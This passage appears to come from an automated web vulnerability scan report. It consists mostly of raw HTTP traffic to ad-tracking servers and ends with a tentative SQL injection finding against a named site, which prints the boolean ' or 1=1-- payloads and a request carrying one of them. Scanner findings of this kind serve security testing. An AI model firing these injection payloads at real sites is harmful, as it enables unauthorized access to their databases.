rds=15138%7C15138%7C15138%7C15141%7C15138%7C15138%7C15138%7C15110%7C15138%7C15138%7C15138%7C15138%7C15138%7C15138%7Cundefined%7C15138%7Cundefined%7Cundefined%7C15138%7C15138%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15138; rv=1

Response 1

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Tue, 13-Dec-2011 12:18:18 GMT; Path=/
Set-Cookie: pf=zNY_iQmPYa_zclA7g1v0xJycYSF0qEoRj_yAFOA4SG5pZRM3I2Ow27XFAiLSy6gtZDpM35cC-2bkiEEmtUQheN5B5Bu9BqMBtjj7wP__NClHw7bLxoA5_jGg94DVp3tlq-dHAl-abYU1X5bYp5n9Cdcc1kdI2OrvyH13NxBc5ZZblSYEdunA88QWsswFnK34IIbRFAp6kq4cSFltcxEru3wiHybxFoqFMdQqHxwvVjx7zBU2vT3hB9b5_A14u9LALQcduwwYmRsag5v8ztN6UjLmZCeHJ6h93qhIv-rUsPdbHJlod6TESSrv6Thxy6WamFlDf1zNmpUN4p-XWvhOtwyxeWnRI3qk58dH_r-y85DlfxWknFJRlb9hzn2M2frNMEh1GRb-PuEMe2Z7syUFVcpaPHcpz9cpkPkyFl8KnA3kFjox_1jCVFJu9ob0C05NyZFnUVV8zZwxZ0Jqede_6SEBTTPtCItPvtKKOGZm7eRvub6YMtD_axmOFpwTegZ0Ik_TZHzQHPkidsWQCuARecCEpqUhieOSE4eC6JSVC4Kb2gj1O0-Z-93OhvmeJIXktssbq-UJ0gwP_tjxgElGHyc6m9bbAQkPtkmDiMOswjx_rgnZHXFHutbbxwpp0mzc0f3MrVLB8Sbr0OplZ0YmpQ6pPLr5WGwJSCaSLyPeD8tW8QIeq5GdjjA2VLfSe86B_U2uPTCuMGNYOoaYgaTljvNEkx61aa1aewp4qtmGVPek9QMkyjNbxjUHQBR4E4B3AGUJgKTp8qs6Sh239g-tJFoqZVBpLhgL2E7flNbkDPo6oQ9T128OqIjRPGIgGqJ0U92zB6HrH6sGkt833E2I0kS2ttJsutMRJGOYaR-soWsrqivW0mVJFXQS3dhrTE8SaKKXBxFLQC_mPwxjkeL_DORS4P3pxhLoRgihOxnoSsDlCw2HnM4YLv0kpO_GVKupX5sc0C6btaAdqNlMlZs4oTCY_AT5rVNqw6Tz15xoxFpBYNWUpIQcuBazjzssqEIPZ5bfZwZFU6nN1pDVXOYaJ8DdOZYF55d1PpfBxPHyuH2RHojg75w7am5jitqGicFdcMaLOL4cJUfMXqa69SSN-06j536gTCcrB8YkBaxDNOYv0spABEy5U_6uYzsaV0qHQy9M-nlqe5xLK0APWVwpFX-_R4ZkxZQ92TvfhRJZWCKsQ-tcOZ2wgA7MRrLH9BDXSkGVYGnSrzAmAhYFK42FCqJ_bp4SQNvkxFNi9IqhDA1c4FCwip4hawpujD7cxMW91JQLloe71uUN_fZGNhLxDRcxm6HVkCDO3jWerY1EJJckUwRn11mDb8lLoWDWOsi7xA5skONMrsqXGo9p_vQs-t8YtMxk53J1X-JEGSNIkxwfWnknNBbhXoz-w093w6uPnrCrV8PM9h2q-bSke-3jj0Ox2DYFU6iqxk5L-aQl1-5uTvAOxSB4mxo-Q6YMhB3VRGEabSKFXWzzMFpGtePKWG6DI-3yIiz3klMj1NWsklmmJwxaXYX8FFp7QAiI8nhwY1wWZ88KpsxHeP2XzXjFK_d-kGppF9S1RgFdt4GxBL--0Hm7pxAE9wMk_nQukZkyBKQSQ1lCnTGDkELZF5yaD5hov27V-adyHqGdS8YvpzfU9SPbCBiT580Iy8irYv9iLBuqwH5rpaIoYyVJTY1OsHZhoKS-Wug910AyWOuinjbr_0z5zf699wFMrWmMcclxzKaAaCNEmLp68Zqq2-LWceDpHaHyI0WpGDwhgIzAtbsX2XsnLt_LbqkSFnImQEfYXMgXlc0VMb90O2rAmT1rycecRmU6rUbNsVDYkn5QLEhbFvkLTc7EK3c3cK3KAt7ZIWB0eYrt6rJ0EoQmsnjCl24yTT_skx4PxMC_6f5JWuwDBmE7vZLIZ9H7tPC0iivWeeN1mguVa38qqmJaz4uUbEOjFEcGULe2ZUh9flwtxT5cGt8FXbRwX1lPbREIX5I_D2yDEgqdLPaeOqMB3phwSOODNlE2lYGr6y0_5J6Hwt_33Lph88Xs-KFXy5W4ivRl_vERszhIysFDRbRBMN3GpvQXHBGqyKUPQThxpOTF1mBnvVPMo6zKgQkjOLsgQfETK5o1Cbsw0Gt8itAK0AFg_BStc7g19L1MTTYv7Hn3oU47PhJPD-mcEisqb13qOvvht_-DVFreVT3zwVb5sJMvIhgejHovgqOT4uj1NncwfIJ0b-RQ3NwrbcUpT2qMXfWSYPxsQgJzG8QzzBt2lV0ge-NeNGb7yjFoK7QuEglqvP9t_vj8eiDnuN0jxaGTEGN4XvI4UrkhsaVUzG7tgYqtXFe8gCjp1FSMzciKpjqLF8rRjHKKyMf3iBzsNJjRLBICfc701uFK16Z8GTUfnagGPaQBmalZ8DIFLMY_ydFO68F9tdI0k-RTl2po5thPnqgz676hey8Q2Glpyu8gs4ySxBbBf9YF0LqeFNmeoiGiHHjGx8yXVuM2hVoYu9RFDnkolfklaPDEFPrf7yuoGjMotqgQPH2igEPEnLjoTMRIBBCPsgjxFuig1iQVVamfEXRPhkIqxbdXxDjRac6Jn1NtVypQBb--Nl12SEYRTSy-QWGl2-87tUUsKuOK8UUbzsrGrf4xc8703QPmY5Dc-7AceWI2QVtBIXRFf08GSMQ1Fu9K93u6Sdfk0fhdbCOiP_aIBBNYnh10h0_GCfVfV7jzJ7OCFCMhy9sZnxEnVsVLETqvFHIcoEqvx3b9PCYMBFot5aXFqJP3F9gm-dE95yUro_-iGBdYbB2xNnDHxyNpokqhxj2kjyUz5gRLkFy__Jjupt8XMNFK_DaHC8hmek7OwZdyIaOQc0I03dJ5hiw9OKqF9-hehgRs004u63INB7FFs-jw20xu54KxqkEY5K8kuTfBmnnmeXqBpFquNfU-r9a2kMiraETMoCsAiiEBbFGv5AEhYoGcQQd6_zkCcjdkXZtRmQ0WYVs8ua9c5OzhGc0IaKVSTGNqGUOXU6B47mx_6WRty3OVB6IGrE_SdvvDYQ0mHy7wHT5CMKPLaFbXGxIwM0yvOhpHHPMeQNoL_8tmA93plKQFnesG7C9l90QrSAfqu2QuVGxD4G1A88MfbLVaEDY-iI4NqLNfUeCf9PUIpxQXcXWeLifFseolSx77MXyFHnoq61yK4lL6wW3kXrpnZ_g0AAeIdqZR3FtK7_PE; Domain=.turn.com; Expires=Tue, 13-Dec-2011 12:18:18 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1210787&t=2
Content-Length: 0
Date: Thu, 16 Jun 2011 12:18:17 GMT

Request 2

GET /r/beacon?b2=uAuceuD961GAkMIYzv5AQziOQ-eCNWHV6KkD_P0UpEIHL-lTlput787BXKmhwi2DTI-ZOLCjHLM7w-8RpLcB7A&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=3076801;type=homed040;cat=homed063;u1=undefined;ord=5328984577208.758?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=QM70Whve3yMvxkhKlZSDFc8jBjr9GZaXPVHd3KPTbrVh-L3XcPmT4hHXOQgApIlYYCcoFPzHtthoKoScENuCacAfwlpOGZwMiTYKzkLyV6yLZO8TKZa-nLTQQ4a65pbCg5Ip47iYWcr2TLdwTDr0L4oBBpiyP3J8NU50OkfeFof5nfT0WqmMXNTAO47jNWqP9DMJbnJ4jgxRBVKYcWOOoBo1vu2lsqV8DN9Vps5BPlmPLL60Ne9Ei9t17XStRc4rGERgBg46FC_PZzOaKvw_-cZloB2cEevUSjzsvfqJ8qZhgZ9g0kmeR-0KBwkm_b3-nHDVWO4oEVu9LZTNJAoERvvIJejvF6b257maU3ML6OZFn0pS1M8s2KPrvUfPPF0_ewHYGlNdqDaG9FYWPprE_WjI_lsRoaOz7-O-vgmKJiTz-KIh4eZr0ecbMlDpVZu91zdW0hE-4eLwR7bomsP7JSdqWSoz4sC-t192PZJ_v5Q-P1VlQMzPKKE64Al6GE9_qQBVWHaPX-roIWbRumWL1-XpDwD22ZRNSBnUmAd0wjxC8t8bNFJSd1YiPEk8t_65cnD2Yeg02hxYDcV4Js2beeQ5R5-3xXfzzH2krAPRf428tdb3ea_CHM6GXs7htoYXSpzxUEP4Lawlcjwmuu0sgABXItk3mefJp5QRHv4O0nQLT7vqCmjKMUnpRJ6SJsSELsnefots81rrNB8RkZzwt9xgKqCmjZaalMlFzn1gedMiR83opqf2DdmsWkwVThPxhyYcbbPOXHwjOkupykmG8XHU2Z_bwsvqeY5PpknKks9Ka5pRG06H0tQ1iybpB3pDqsDA387b4GyTrdtR0OxRq1W2-clEv_ue7qpjwh19AlSzwxLx1pBhUX4CYwoSQucKtJqb949HbLP0at-l-Te-c7NLS367-cid5bH8-bJWmY8nC9B9w1ij88w7eqsM7UhZeuq4rrlofmxpvpW8sH43ef-7J7zFZpaqjQcGC_vq5exjB6sqt4Mo-GvkAj2qErRL9pWBI8bQOJli1okJuMhLcQljneDOkY9olIfd-ve5Qn4-P1VlQMzPKKE64Al6GE9_6W9aRH84b2cB20BvmgB1t-XpDwD22ZRNSBnUmAd0wjyOWY3k4-itBWJe_k62xWOCrFV4LhRdbHCAEu2Xc3dVj-Q5R5-3xXfzzH2krAPRf418WpxTiSnvzOJ-ZkQfvNQASpzxUEP4Lawlcjwmuu0sgAGs1MSewshLM0Q6GhK5Ns8fU1J7JmYpzzzNP9hB_wUy05oRsNhTbhcD1_xCDQojfMSuZLsISBijKSjMDSgLlyDjsNAVa5Ct7DxoA1avkLsQ815KVjL9JqXyOpgagVKRMbntt6vzlmgFJ9k1Zzq45WeFCQUiSJFaYOp4MQlbe-RFUEK9KsJrC9CLkGJUacP7jEa1wTMgEYoXiZA8_W3FI42qThwrh-6wCu7vlgqZNOXixmWgHZwR69RKPOy9-onypkTIcQzOQc65c9KVO3IQPv8Yd11jfaAGeomVXk2jyqz756mNhe7mBUb-nxi7SHg4OCY4fQNDPmLA1QCvKDvVxcR7AdgaU12oNob0VhY-msT9lb_ydeK6sfV-VwC1t6PXZrSU8zXCbuEO-Hn-xUU7T4MdZMXr1rBrtZHchRIeH_p0MQswiaZbyLrfvl0j4wXxTj4_VWVAzM8ooTrgCXoYT3_ukoy-I69c7SrUTlHbB6rZ5ekPAPbZlE1IGdSYB3TCPPtQxe5L3Tuc-yk0WOEmJZ9iOsnV5UjcUOjnXUSJzJan5DlHn7fFd_PMfaSsA9F_jfnYBNZ11ca-Wgmkknbh9eNKnPFQQ_gtrCVyPCa67SyA_xeh6xaAKc9mefeGrL2bordkSY3wrTx66nlJUXJL2YzTmhGw2FNuFwPX_EINCiN8l08PBB5hX0JN8MvjDOsPSeOw0BVrkK3sPGgDVq-QuxAsFTUl8EdeBakl_JEHsyGF2Jfo-RxTjyjBkOV794zNZ0kTA-aymPAds4qYFrApgUvcPT0oUz-YZYVaDcHqgl-9xmWgHZwR69RKPOy9-onypimfvYrBKXvtznWuT43S50y-3u16r0dKm_zz3ndHe3WlG-QgtH60dqlqdrI16uF-EVNzoshUKoWhiHnNcI8oP4V7AdgaU12oNob0VhY-msT9kNb2AdwFV5i2vxwzlIKJ3BfY904hG-_CHlEd9j-vzfzk5Jifrc9V1OOzEX32QifKI3TThUmivC2QQLLhMmAROj4_VWVAzM8ooTrgCXoYT3-ZdIfAS6iVxgYyOedo9Ki95ekPAPbZlE1IGdSYB3TCPEX3xTtUTn7ghX1OdIngM2q-RWnunI4BlM040X2RcB965DlHn7fFd_PMfaSsA9F_jUBCGuQvL_fhodmVMnOIMvBKnPFQQ_gtrCVyPCa67SyAw4hmx2eXEqzbsKwy_MNlFfUa0Y_5ftklciMdgbQhb_wbdYORBXyNJvBU7ewnBysYP_zg1-oPoaJCGGP6Vt55Gz_84NfqD6GiQhhj-lbeeRs__ODX6g-hokIYY_pW3nkbP_zg1-oPoaJCGGP6Vt55G1OKf083dm4Ocqz5E2RJpVu9TfQkOcNz7DOIIZP_23WvvU30JDnDc-wziCGT_9t1r71N9CQ5w3PsM4ghk__bda_nUnHYqNkC6RPs4-2B8pJoMqCuwkKr26TEWeaS686ExCPxJGFKBs6DSrH4oyWVjhIBdxGEbgsgCDz8r26d8pRZAXcRhG4LIAg8_K9unfKUWejxkXIMl02q9l3ycv51k_QH1ePXpCkOqUdD3FJ26E0LEgnOhSnZw4WOirtIvKWwJRIJzoUp2cOFjoq7SLylsCUSCc6FKdnDhY6Ku0i8pbAlEgnOhSnZw4WOirtIvKWwJTJGg5u5RuPReUxP5byb5LGsjsJdNDz0zBLNR8ReLDcirI7CXTQ89MwSzUfEXiw3Iv5E8JDY11x5xog0GskBswr-RPCQ2NdcecaINBrJAbMK_kTwkNjXXHnGiDQayQGzCjVgVkoy7DysIPcuC3AUG0sb1BDdWaxOURi_bqX1S5T5G9QQ3VmsTlEYv26l9UuU-W___E3ohWz6drp_rI2j18pjDJAj7Gbh3rF9uN2-5_zdRHqYmtLfdK6unD4Xv15XLH0evbFMdkuI2WqEUI01UYXDJU38vLMvNPfD69rioBNl6-78JM-YwVK9vMhQzP5aE-vu_CTPmMFSvbzIUMz-WhPr7vwkz5jBUr28yFDM_loT6-78JM-YwVK9vMhQzP5aE-UaEwuQGXrKf1B0pg93pQC8wfsfoRTDgpAqCg9KVA9UvMH7H6EUw4KQKgoPSlQPVLzB-x-hFMOCkCoKD0pUD1S8wfsfoRTDgpAqCg9KVA9U-Nxmcu6N80G4H7yE1a6GL_jcZnLujfNBuB-8hNWuhi8zo63SsMKXllQ8R3TROrVZwRV4qFgI_yJZybaj30x3rZThUGsgezmPZdo0hiRJAEU2UlTEERLOiMahUz0Je5vrQpUNsf8ubz28dE3HpFhXM4HLQRF00hhIXSJp9kwMyEKBy0ERdNIYSF0iafZMDMhCgctBEXTSGEhdImn2TAzIQou93XF3r4cgLiZIl0wssIM; fc=c8voyByxtfmxf-PR5HgfpjgORIc3Od-xFb-8M8t9VWkz6wrQqI-cCCIP4q7JSoro0YGlpSJHEwaZrD9xrQykZRLTM2UWqcEggsPn2JlFm6WKJ47y0SjHASrSoX2-_RWGR8GD8YL2uMyYOovbWSVtT_OjMRX_o6D3TvHXeB0H3IoJPxIPX2Q6BIRFliap-hOlRK2X8EADYMp4JB-33zSWnLP_4lD6MCBjT4SRxTIxlhNKLFBAG3Fk9H3_mDAMZFkDVnBVtdUIoJ-JIgllkJFaAJbHZLznezJA10wgg7oc-ufuxx6wPWxSLH-VTpbekwI2; pf=bskS8Lli70BjXEzd5NYfF8V9tHnIhHPKzn-ZptMbz3NTv4g2_4PHk6pD33NmTL25iyDxX-e5nvqK08ftGFlNZcB-blYU8Y2b3uGZySbN9k4boogWXDFyI4_-RvN_buohq-dHAl-abYU1X5bYp5n9Cdcc1kdI2OrvyH13NxBc5ZZblSYEdunA88QWsswFnK34IIbRFAp6kq4cSFltcxEru3wiHybxFoqFMdQqHxwvVjx7zBU2vT3hB9b5_A14u9LALQcduwwYmRsag5v8ztN6UjLmZCeHJ6h93qhIv-rUsPdbHJlod6TESSrv6Thxy6WamFlDf1zNmpUN4p-XWvhOtwyxeWnRI3qk58dH_r-y85DlfxWknFJRlb9hzn2M2frNMEh1GRb-PuEMe2Z7syUFVcpaPHcpz9cpkPkyFl8KnA3kFjox_1jCVFJu9ob0C05NyZFnUVV8zZwxZ0Jqede_6SEBTTPtCItPvtKKOGZm7eRvub6YMtD_axmOFpwTegZ0Ik_TZHzQHPkidsWQCuARecCEpqUhieOSE4eC6JSVC4Kb2gj1O0-Z-93OhvmeJIXktssbq-UJ0gwP_tjxgElGHyc6m9bbAQkPtkmDiMOswjx_rgnZHXFHutbbxwpp0mzc0f3MrVLB8Sbr0OplZ0YmpQ6pPLr5WGwJSCaSLyPeD8tW8QIeq5GdjjA2VLfSe86B_U2uPTCuMGNYOoaYgaTljvNEkx61aa1aewp4qtmGVPek9QMkyjNbxjUHQBR4E4B3AGUJgKTp8qs6Sh239g-tJFoqZVBpLhgL2E7flNbkDPo6oQ9T128OqIjRPGIgGqJ0U92zB6HrH6sGkt833E2I0kS2ttJsutMRJGOYaR-soWsrqivW0mVJFXQS3dhrTE8SaKKXBxFLQC_mPwxjkeL_DORS4P3pxhLoRgihOxnoSsDlCw2HnM4YLv0kpO_GVKupX5sc0C6btaAdqNlMlZs4oTCY_AT5rVNqw6Tz15xoxFpBYNWUpIQcuBazjzssqEIPZ5bfZwZFU6nN1pDVXOYaJ8DdOZYF55d1PpfBxPHyuH2RHojg75w7am5jitqGicFdbR_ukiIJxkBku1CxquV17mPFnSRDfouZL6wYhXooxR9ULrxpvguFI2ofDAIOd3EuO9yXy3nBEXqSScPA5E39O2_zg7l3tDIiyF94B5aERskWHv8BOnUkNaZrdPIQNGZqdwsP9I0MRtXw8xQWWbNPUyQsdjE_Scn2QYUNUmcT7rDH85LuW-sDtP4uwhJo9atGrEPrXDmdsIAOzEayx_QQ10pBlWBp0q8wJgIWBSuNhQqif26eEkDb5MRTYvSKoQwNXOBQsIqeIWsKbow-3MTFvdSUC5aHu9blDf32RjYS8Q0XMZuh1ZAgzt41nq2NRCSX590hwfiGo-qcVT2kvWmzeR7b1paN0zLvFemp5AQnABOzIFk-pYt5rgVKJ87aXtgPb-mafaJ5_5dz5FYF2gdO3-RhTnUyFltTQjNRcqU7m_5Dsdg2BVOoqsZOS_mkJdfuPEzm6ziEo1_QjXTUZsQGb3aBmo_VB_3afAvA7HmJ70VD1x9GqiaHujprGHOBA7aEDie69XnZ9g3UdQ8qboT72h45foF_fR8Dfspr5EIo6mININ0MwGURZOI6NOy-sr20mDmWfrauITMqFQqh085LSKQUL7YGM0pJp1-FIztq58QhVWy6LSDOwot2ckvPUzkd-FnxN8NhVB8sqANsWORR78w7iqAGDudyRR4sGrjr4yCu4BPZ9sxxEAJuqkU9WhgK5HyS-jWx86QRjwbOSlxW_AShejO2Api9OqW7wGthrtivajOoHMt7EKDIqFqYM0LalgBhHGk98NLPXedpy1UU1G0p61bv1d1Qe8RvD9O3tReDwxPBbZMzCCP1zNubGNg83l1aV51TfDhTgj1yUZOWuS-pj8W99_7k59ODgmGDUx1RLP4RQV5YsF7eRC_oBFtd7vTs-bMZZ3cr36hzZbdHwcgMjIQ67GgiGFnif7dZxa3qqTs_pw5jFRYMsjf2CDWROI6mFHsv9rileAh5u94Tal8X9jZGPmZVvtACyANcU61_2D_gjytCfJX5eIYzCUnD9N0uTPecPGlXnt0zeFF6nGhy-4kHkvuGu7mFLrHknQIOqyVa7C5Vcz2ztFo648TLIYncavW2EU0-FxAowg7Q_J3_JUWPrldWd5VL7X-3ELxQm3QGLlDe9QHA7dTmmKmFxV0767zf8vh0-XU0u6MJx4viNkNYwNHgm3A-Zsn_tb2nFJRjBcEMxdDM5u496FsXzZoCQNrRn4Nka-1SbHAlq1j0766BFlUYsZHI9nvDUSjNUKoFWTkAUa-o1j-LL1ebdsaBpOZQwog1WHvup_q5MU0eWf_8Tnz19zggAp1l0o0E-qtSYNUJ36V_bsysgOo8ovHlz0rw4urFgweCpjhoovSxZ6xAsLQbFPBlhboS688EaXiGds-5scOf0AWtR0WtyJH-06RSCV4rzVRndoxKQ6xvTNWKSQfuYds5-6wqXTrrprCUxSH31llwL8axfVJ0d6h2Ke1Lez9-eYMqCkG4uUOXcVRZwxg85KAU3HRwHZ-EWY6qIaKdc8DaRYJXxJzEtphWqdWwTUQc6r3kmRMNC1ofRqXiWAg7U15-Vq8fXUTyQ-Foh2RKGC89bCSZhuIo0DelrjnD_y1FdMAK6632Po5svz9Xs-GXO_PYmIh52EUXzRY-jfWrhp-btGaCKGToFYaTe9bd1jKXwduyoimxxjrfcWCeJq1txaaBU_3Uczg1vUpNInXslg4NWbOv3i1AMVsxWmxcjn77s3i60QHhTEr6gILrU4PmsHL3FqzwzpkTuJbzWi_g5eyZHwtMfpYoYwULodolIu7euVx1T6-kom1lfGeK534YvRLg1f6xfa7TbJat7GFUh5YcwiKTv6i2BObi71nwu2712ua_zaapTMdVqI2HeT5VUjRYlLwTM6Q4btGEdG0d_jWUX-DJJ6s4pWL_6FerjeM6JRh-LuLiaWTXIluKkF9otMRxuQA1xZO-l_PyGdq8ZIdQBo46D090aTaKlV1enoq-_ZVUdLnFjEj8JuvB_NmaEIhlkkUtL2E3UODDMR1tOQu8PjS8RbchSrxsTjxxMOUEsUJ_Z756RnNmhOA_TD07hZfxuz8bhfLCVULYz6Ok1J2_QA_kXIY92iqRVh1b6IbTDyOALqZNl5K11KDpAXL1nqDbSN94B3fAGfWH1075KVzt7-y7v8wzj5HvH-kwIHXGh1rq2Sy1u7pxUuundR497HrST_MMHxNG2Kdut19FcHWUqjUfID5JAiaS2fFEZWuWIqjpSvJM2ivPIAO7c_zUdwbkiWS8ejzieFqJCa8rSsS_dWSQq-Icz8Io9aHLgwbQxkFBxTOEAWmKRZWPfJkX_p8vFnb1Nu9kYvRadgXAM7qphVq6O0Tj; uid=4325897289836481830; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C10%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18%00''; rds=15138%7C15138%7C15138%7C15141%7C15138%7C15138%7C15138%7C15110%7C15138%7C15138%7C15138%7C15138%7C15138%7C15138%7Cundefined%7C15138%7Cundefined%7Cundefined%7C15138%7C15138%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15138; rv=1

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Tue, 13-Dec-2011 12:18:19 GMT; Path=/
Set-Cookie: pf=QkXlLsXeCof1FxNQlI490eQPsAJdXZ7IIbiMDv2SRfISHVK1_OEyMmAGdBklK9v3ZDpM35cC-2bkiEEmtUQheAr1JHtLNIcOUiq7qjRhLlMTVtX1JClFcyiqN-UpZ4B0q-dHAl-abYU1X5bYp5n9Cdcc1kdI2OrvyH13NxBc5ZZblSYEdunA88QWsswFnK34IIbRFAp6kq4cSFltcxEru3wiHybxFoqFMdQqHxwvVjx7zBU2vT3hB9b5_A14u9LALQcduwwYmRsag5v8ztN6UjLmZCeHJ6h93qhIv-rUsPdbHJlod6TESSrv6Thxy6WamFlDf1zNmpUN4p-XWvhOtwyxeWnRI3qk58dH_r-y85DlfxWknFJRlb9hzn2M2frNMEh1GRb-PuEMe2Z7syUFVcpaPHcpz9cpkPkyFl8KnA3kFjox_1jCVFJu9ob0C05NyZFnUVV8zZwxZ0Jqede_6SEBTTPtCItPvtKKOGZm7eRvub6YMtD_axmOFpwTegZ0Ik_TZHzQHPkidsWQCuARecCEpqUhieOSE4eC6JSVC4Kb2gj1O0-Z-93OhvmeJIXktssbq-UJ0gwP_tjxgElGHyc6m9bbAQkPtkmDiMOswjx_rgnZHXFHutbbxwpp0mzc0f3MrVLB8Sbr0OplZ0YmpQ6pPLr5WGwJSCaSLyPeD8tW8QIeq5GdjjA2VLfSe86B_U2uPTCuMGNYOoaYgaTljvNEkx61aa1aewp4qtmGVPek9QMkyjNbxjUHQBR4E4B3AGUJgKTp8qs6Sh239g-tJFoqZVBpLhgL2E7flNbkDPo6oQ9T128OqIjRPGIgGqJ0U92zB6HrH6sGkt833E2I0kS2ttJsutMRJGOYaR-soWsrqivW0mVJFXQS3dhrTE8SaKKXBxFLQC_mPwxjkeL_DORS4P3pxhLoRgihOxnoSsDlCw2HnM4YLv0kpO_GVKupX5sc0C6btaAdqNlMlZs4oTCY_AT5rVNqw6Tz15xoxFpBYNWUpIQcuBazjzssqEIPZ5bfZwZFU6nN1pDVXOYaJ8DdOZYF55d1PpfBxPHyuH2RHojg75w7am5jitqGicFdjvdQWoWzqMK0drdqRnQSu6m5tCSgQ9okTgBLIfp7onLJE-aClvF86XEG4y2j7Z9gl2gRWhWGYpvLAxA12w9cxiIBMhK7XJNw8X8COJW_RkR5xzwvpeRqXCzd5zwVq62EgBkS8lgn_0fR46CiaxQScz8BZJ8Rv4Ff_c_3rVtIIN1i8UiQErusP9NO6AxTgL1R9GXJNBLuxCil8OstE6UbErLgYgxKhpXLkzUs0B5wU7rwVFIBOqPN9C41MRxI4I-PwInFmX86VXogn3Ug5S4btYU88gy6fFTI6k9Lc8oTkR9RS7ahaBzeY1ExInPPa3blfamT46xg16p8euZB7eQVYAYzkTdgBz17_7yGtSkNiNXMKv0kCNhz14WyHRtxKPKNUmeBsP0aUt5oVR5-YC2c6uVqXA-UUQOby0yN7jLB8i9RCiSB7bxZBuw62UiWlH6qTlxKtZwu9mxvrwly1rFPraqBXpiSWkWNdhqOFdseOHzBTROtWl0b2NPVbRqMwYE7vgyZkcPju4h8dXOW1YRC2EkY5ktqOpws9vn-tQw4C9Pgk-8b4vO-EtKQS29EqGyEiqFrgLQbs_KMqw9Ai-wuJeb7tZjoq9Xjfe3S_MQGeuaOxOHVqZ8CtpOZEmf9cbQcXEI1IP3ZiGEPDKW14z9lqNo1zaL7mkGUUbcQzcLotTkzELHTm4CrVNO4IAE_bQoQrda6uWlMmwtlOmB1DPe7MSsesve6vuBgJLL6nasaSg93C1yz0D1afpPwNJe8kc4d6aqIyN7aM5G7iGJ5cooWxIImd9eLNEhcTp44Fl4MpWiQRgQcEsfe_QTcoVdsmoM46IOvwY43JxSSaogx2WI4Y4D0gqZRjgSblBAjI68x3cxQNGLeMpAZnlJZ-L3SmNbMjjmVHmkk_-kBlcty4HjY0H8u2t1hYZ87GZZjAmAFUlPIYU1tRmSXIcPfF4hLwBMnow5jP1zELEB-J2bHbTxZs1kRBAdDG2iEqya0fjCizViwf-BtUiBJARqMsv8pcBsagQiB-_G71hkEaDNGB691oA7n83t3xebtv1vUtV_fo27xBQgJwN0WaX0mAgtftdzasdfADbPQNbNcAmotsl3_lC2-CuVZ-X3zQqoA0L5GtrYiJscC5D1RWZ-iLd5VKH_H9V0z_3argECBQ297KevASH91dt11YTrSl4jAu3uAHR6nR7n6Rwh9KKtB4kiNg2voFVVORwg9ZptXnoETA-nrIkjKXGdCoMkpFadMDbhgpnb3ORwAzqg0PMCO0pghekwgFPR3-U6O-iJqIUmx-ooGGwVlHB6kV0IwZiDGfrUYrbIxvdYLbjC1jLLmfgWCrh3gqGuW2wITqqg7s5AGH77norxafsfNsoi-DwCrG0K3NTHuXAEAA1Ktng_3xPtcUTuSsdEtY7ZYFcBZQ1y0ATyghVuv1cV2KYeJr1SeyM5ad7NmqRByD7y2n1mCnxxKsb6sl5tNicgYNpqsIQwFe_U9bui7Dnq02l9N_Z6ViZKOStEBirr4CXMtiDW4w_7vxGu6c5qcSmjNKRjbC_dGLUSdMdlhb5rkWmgnWmzhuRo0HuNYR_YY3DEEM_i2LorcaiS_xOEQbfF9mepjhhg-xn7UisdgkcOoh4w6twOxuVwhuhnkK5TWoOhRHy1HahEz4hD9wLj0XDnJrRPsXnPzDtO5YIbO_0H81Av_WEOXlw64dEJToedCjM_rJANTA7mEJzrlb0o8QEr2QX7q5s9ON8--wpoqZq8b18bKoFV6hCVVjUAvcRCz0U9ob0r6FT3E9YlM4BnIUh7fNXzlGrmulWgzBQtu1DAQgPxgss4TuKAMASVtRlrHly51JHNPp0y2NJa0BEaiAuNZITLmSKFF3F9WLiFQcukpu7C7xWzK2jiRfNiORt5kNklylYixSq3CxlJ_gsmqmV5Rcfx0bJXukxAJj28jwWsqqfo1eCQbvjAUdRPl2z9iU_1tUwpXsHYGz-QeAAgsQUjlwrgOoYfmTrtuwVfmAPUqu3TpVjSd22qkYznqS7vknwhCjycawFpJqNxCaSa-USwNSLxdAY8rCpibKJTw3EBpcO1UY56GbWKx3Zg; Domain=.turn.com; Expires=Tue, 13-Dec-2011 12:18:19 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1210787&t=2
Content-Length: 0
Date: Thu, 16 Jun 2011 12:18:18 GMT

1.14. http://script.footprintlive.com/ [site parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://script.footprintlive.com
Path:	/

Issue detail

The site parameter appears to be vulnerable to SQL injection attacks. The payloads 18703088'%20or%201%3d1--%20 and 18703088'%20or%201%3d2--%20 were each submitted in the site parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?site=nicusa.com18703088'%20or%201%3d1--%20 HTTP/1.1
Host: script.footprintlive.com
Proxy-Connection: keep-alive
Referer: http://www.egov.com/Pages/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
